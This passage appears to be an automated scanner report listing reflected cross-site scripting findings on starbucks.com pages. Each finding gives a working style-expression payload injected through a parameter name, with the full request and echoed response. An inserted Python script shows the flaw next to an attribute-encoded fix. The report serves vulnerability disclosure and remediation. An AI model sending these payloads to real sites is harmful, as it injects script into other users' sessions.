Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:24 GMT
Connection: close
Content-Length: 53628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?7511a"style="x:expression(alert(1))"c08da2b8d6b=1"/> ...[SNIP]...
3.20. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32506"style%3d"x%3aexpression(alert(1))"0b3e0429598 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32506"style="x:expression(alert(1))"0b3e0429598 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and IE8 and later ignore them in standards mode), so this particular payload may not fire in other browsers; the underlying defect, a double quotation mark reflected unencoded inside an attribute value, is not browser-specific.
Request
GET /coffee/whole-bean-coffee?32506"style%3d"x%3aexpression(alert(1))"0b3e0429598=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:46 GMT
Connection: close
Content-Length: 54456
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?32506"style="x:expression(alert(1))"0b3e0429598=1"/> ...[SNIP]...
3.21. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/africa-arabia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36fd8"style="x:expression(alert(1))"eee799f60ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/africa-arabia?36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:18 GMT Connection: close Content-Length: 41207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?36fd8"style="x:expression(alert(1))"eee799f60ab=1"/> ...[SNIP]...
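The mechanism behind these findings, as an added example that is not part of this report and is not the scanned application's code: the decoded request URL is written into the double-quoted content attribute of the og:url meta tag without attribute encoding, so the double quote inside the parameter name closes the attribute and the remainder of the name becomes a new style attribute on the element. The script below uses the payload from finding 3.21 and hypothetical rendering functions (an assumed reconstruction of how the page builds og:url); it shows the vulnerable rendering beside the attribute-encoded fix, reproduces the scanner's "echoed as" check, and parses the result with a lenient HTML parser to show which attributes the browser actually ends up with. The expression() part of the payload only fires in Internet Explorer, but the attribute injection itself is browser-independent, which is why the fix is output encoding rather than blocking particular strings.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# Constructed from finding 3.21: the canary is the *name* of an arbitrary query
# parameter, with "=" and ":" inside it percent-encoded exactly as in the request.
BASE_URL = "http://www.starbucks.com"
REQUEST_PATH = "/coffee/whole-bean-coffee/africa-arabia"
RAW_QUERY = '36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab=1'
PAYLOAD_NAME = '36fd8"style="x:expression(alert(1))"eee799f60ab'


def canonical_url(path: str, raw_query: str) -> str:
    """Rebuild the request URL from the decoded parameters. This is an assumption
    about the application; it matches the decoded form the report shows in og:url."""
    pairs = parse_qsl(raw_query, keep_blank_values=True)
    query = "&".join(f"{name}={value}" for name, value in pairs)
    return f"{BASE_URL}{path}?{query}" if query else f"{BASE_URL}{path}"


def render_og_url_vulnerable(url: str) -> str:
    """Assumed vulnerable pattern: plain concatenation into a double-quoted
    attribute. A '"' inside the URL closes the attribute; what follows is markup."""
    return f'<meta property="og:url" content="{url}"/>'


def render_og_url_fixed(url: str) -> str:
    """Hardened form: HTML-attribute-encode at the point of output. quote=True
    turns '"' into &quot;, so the value can no longer terminate the attribute."""
    return f'<meta property="og:url" content="{html.escape(url, quote=True)}"/>'


class _MetaAttrs(HTMLParser):
    """Collect the attributes a lenient HTML parser assigns to the first <meta>."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "meta" and not self.attrs:
            self.attrs = dict(attrs)

    # Self-closing syntax (<meta .../>) is routed to the same handler.
    handle_startendtag = handle_starttag


def meta_attributes(markup: str) -> dict:
    """Return {attribute name: value} for the first <meta> element in markup."""
    parser = _MetaAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def echoed_unencoded(markup: str, payload: str) -> bool:
    """The scanner's own test: the payload reappears verbatim, quote intact."""
    return payload in markup


if __name__ == "__main__":
    url = canonical_url(REQUEST_PATH, RAW_QUERY)
    for label, page in (("vulnerable", render_og_url_vulnerable(url)),
                        ("fixed", render_og_url_fixed(url))):
        print(label, "echoed unencoded:", echoed_unencoded(page, PAYLOAD_NAME))
        print(label, "attributes on <meta>:", sorted(meta_attributes(page)))
```

In the vulnerable rendering the parser reports a style attribute whose value is x:expression(alert(1)); in the fixed rendering the only attributes are property and content, and content decodes back to the original URL, which is the behaviour the "Issue remediation" section asks for.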
3.22. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee/whole-bean-coffee/asia-pacific
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d4f5"style="x:expression(alert(1))"07322c9d36a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /coffee/whole-bean-coffee/asia-pacific?5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:23 GMT
Connection: close
Content-Length: 40730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?5d4f5"style="x:expression(alert(1))"07322c9d36a=1"/>
...[SNIP]...
3.23. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc378"style="x:expression(alert(1))"dc2a561ad6f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:32:57 GMT
Connection: close
Content-Length: 42564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style="x:expression(alert(1))"dc2a561ad6f=1"/>
...[SNIP]...
3.24. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee/whole-bean-coffee/latin-america
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ed27"style="x:expression(alert(1))"54fc7b2d713 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /coffee/whole-bean-coffee/latin-america?9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:15 GMT
Connection: close
Content-Length: 44497
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?9ed27"style="x:expression(alert(1))"54fc7b2d713=1"/>
...[SNIP]...
3.25. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee/whole-bean-coffee/multi-region-blends
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f92e"style="x:expression(alert(1))"69974f7cbb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /coffee/whole-bean-coffee/multi-region-blends?2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:29 GMT
Connection: close
Content-Length: 44773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?2f92e"style="x:expression(alert(1))"69974f7cbb4=1"/>
...[SNIP]...
3.26. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68bf7"style="x:expression(alert(1))"0236f70923d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:22 GMT
Connection: close
Content-Length: 41054
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style="x:expression(alert(1))"0236f70923d=1"/>
...[SNIP]...
3.27. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /customer-service/faqs/coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8de96"style="x:expression(alert(1))"6b0cfc1dd14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /customer-service/faqs/coffee?8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:45 GMT
Connection: close
Content-Length: 37419
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffee?8de96"style="x:expression(alert(1))"6b0cfc1dd14=1"/>
...[SNIP]...
3.28. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /menu
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12942"style%3d"x%3aexpression(alert(1))"90f8a013063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12942"style="x:expression(alert(1))"90f8a013063 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:32 GMT
Content-Length: 72476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu?12942"style="x:expression(alert(1))"90f8a013063=1"/>
...[SNIP]...
3.29. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /menu/drinks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50acb"style%3d"x%3aexpression(alert(1))"842d349c684 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50acb"style="x:expression(alert(1))"842d349c684 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /menu/drinks?50acb"style%3d"x%3aexpression(alert(1))"842d349c684=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:14 GMT
Connection: close
Content-Length: 61971
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks?50acb"style="x:expression(alert(1))"842d349c684=1"/>
...[SNIP]...
3.30. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /menu/drinks/frappuccino-blended-beverages
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1532"style="x:expression(alert(1))"3f7f1489b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages?f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:12:51 GMT
Connection: close
Content-Length: 50806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages?f1532"style="x:expression(alert(1))"3f7f1489b5=1"/>
...[SNIP]...
3.31. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /menu/food
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5cc1"style="x:expression(alert(1))"ffcdae7abe1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /menu/food?c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:45 GMT
Connection: close
Content-Length: 56860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food?c5cc1"style="x:expression(alert(1))"ffcdae7abe1=1"/>
...[SNIP]...
3.32. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /menu/food/bakery/cranberry-bliss-bar
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78c8e"style="x:expression(alert(1))"9db2eb51a72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /menu/food/bakery/cranberry-bliss-bar?78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:04:47 GMT
Connection: close
Content-Length: 41261
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar?78c8e"style="x:expression(alert(1))"9db2eb51a72=1"/>
...[SNIP]...
3.33. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /menu/nutrition
Issue detail
